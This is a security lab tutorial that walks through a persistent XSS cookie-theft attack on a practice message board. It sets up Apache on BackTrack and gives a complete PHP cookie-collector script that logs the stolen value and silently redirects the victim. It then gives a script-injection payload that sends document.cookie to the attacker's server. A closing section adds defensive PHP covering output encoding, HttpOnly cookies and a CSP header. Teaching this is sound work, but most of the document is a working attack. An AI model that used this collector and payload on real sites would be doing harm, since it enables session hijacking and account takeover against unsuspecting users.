Stealing Cookies with Persistent XSS
What You Need
- A BackTrack 5 machine, real or virtual. I used a BackTrack 5 R2 virtual machine.
Purpose
If a website has a Persistent XSS vulnerability, you can inject code and attack other users. We'll use this attack to steal a cookie. This sort of attack is commonly used to gain access to another person's account on webmail or social network sites.
Starting Apache
On your BackTrack Linux machine, at the #> prompt, enter these commands, each followed by the Enter key:
service apache2 restart
netstat -an | more
You should see the local address 0.0.0.0:80 in a State of LISTEN.
Testing PHP
At the #> prompt, enter these commands, each followed by the Enter key:
cd /var/www
nano test.php
In nano, type in the code shown below:
<?php phpinfo(); ?>
Press Ctrl+X, then press Y, then press the Enter key. This saves your file.
From the menu bar in the top left of the BackTrack desktop, click Applications, Internet, Firefox Web Browser.
In the Firefox address bar, enter localhost/test.php and then press the Enter key. You should see a PHP configuration page. This verifies that Apache and PHP are running correctly.
If PHP doesn't work, try re-extracting BackTrack from the original 7-zip file.
Writing a Cookie-Storage PHP Script
The script we will use does these things:
- When a user sends an HTTP GET request to this script with a parameter c, that parameter is stored in a file
- It will also store two other values: the IP address and the referring URL
- It will save this information in a file named cookies.html in the /tmp folder
- It will then return to the original page, so that the user has no idea that anything unusual has happened
On your BackTrack Linux machine, in a Terminal window, execute this command:
nano /var/www/steal.php
In nano, type in the code shown below:
<?php
// Values taken from the incoming request
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
// Build one log record
$out = 'Cookie: ' . $cookie . "\n";
$out = $out . 'IP: ' . $ip . "\n";
$out = $out . 'Date: ' . $date . "\n";
$out = $out . 'Referer: ' . $referer . "\n\n";
// Append the record to the log file
$fp = fopen('/tmp/cookies.html', 'a');
fwrite($fp, $out);
fclose($fp);
// Send the browser back to the original site
header("Location: http://games.samsclass.info");
?>
<HTML></HTML>
Save the file with Ctrl+X, Y, Enter.
Finding your BackTrack Linux Server's IP Address
Make sure your BackTrack Linux virtual machine is using Bridged networking, not NAT. If necessary, renew the IP address with the dhclient command.
In BackTrack, in Firefox, execute this command:
ifconfig
Testing the Cookie-Storage Script
On your host machine (NOT the BackTrack machine), open a Web browser and go to this URL, replacing the IP address with the IP address of your BackTrack machine:
http://192.168.5.36/steal.php?c=test123
If you made any errors typing in the script, you will see an error message telling you which line has a problem. Fix those problems and don't proceed to the next section until the PHP script is working.
Viewing the Stolen Data
In BackTrack, in Firefox, execute this command:
cat /tmp/cookies.html
Viewing the Vulnerable Message Board
On your host system, open a Web browser and go to this page:
http://games.samsclass.info/vulnphp/
This is a simple message board, using your name as an authentication cookie.
In the "User ID Page", enter your name in the box. (Don't use the literal string "YOUR NAME"--instead, use your own real name.)
Click the Enter button.
On the next page, if any comments appear, click the "Erase Comments" button.
Enter this comment, replacing the IP address with the IP address of your BackTrack Linux server:
<script> document.location="http://192.168.5.36/steal.php?c=" + document.cookie </script>
Click the "Post Comment" button.
The page just stole your cookie, and it will continue to steal cookies from everyone who views it until someone clicks the "Erase Comments" button.
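The defensive counterpart to the injection above, as an added example that is not part of the original lab or the code behind the vulnphp board: hypothetical PHP helpers showing the unescaped rendering that makes a stored comment executable, the same output encoded with htmlspecialchars(), and cookie and header settings that keep a session value away from injected script. The function names, the sample comment, the 192.0.2.10 address and the HTTPS assumption are illustrative.

```php
<?php
// Added example: hypothetical message-board helpers, not the lab's code.

// Vulnerable pattern: stored text is placed into the page as markup.
function render_comment_unsafe(string $author, string $text): string
{
    return "<p><b>$author</b>: $text</p>";
}

// HTML-encode a value at output time so markup characters become entities.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every user-controlled value is encoded before output.
function render_comment_safe(string $author, string $text): string
{
    return '<p><b>' . h($author) . '</b>: ' . h($text) . '</p>';
}

// Cookie options for a session token (array form needs PHP 7.3+).
function session_cookie_options(): array
{
    return [
        'expires'  => 0,       // session cookie
        'path'     => '/',
        'secure'   => true,    // assumption: the board is served over HTTPS
        'httponly' => true,    // value is not exposed through document.cookie
        'samesite' => 'Lax',
    ];
}

// Response header that refuses inline <script> blocks as a second layer.
function csp_header(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'";
}

// Constructed stored comment in the shape used in this lab.
$stored = '<script> document.location="http://192.0.2.10/steal.php?c="'
        . ' + document.cookie </script>';

echo render_comment_unsafe('Alice', $stored), "\n"; // browser would run the script
echo render_comment_safe('Alice', $stored), "\n";   // browser shows it as plain text

// In a login handler, issue an unguessable token instead of the user's name:
// setcookie('session', bin2hex(random_bytes(32)), session_cookie_options());
// header(csp_header());
```

Encoding at output time is the primary fix; HttpOnly and the Content-Security-Policy header limit the damage if an encoding call is missed somewhere.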
Viewing the Stolen Data
In BackTrack, in Firefox, execute this command:
cat /tmp/cookies.html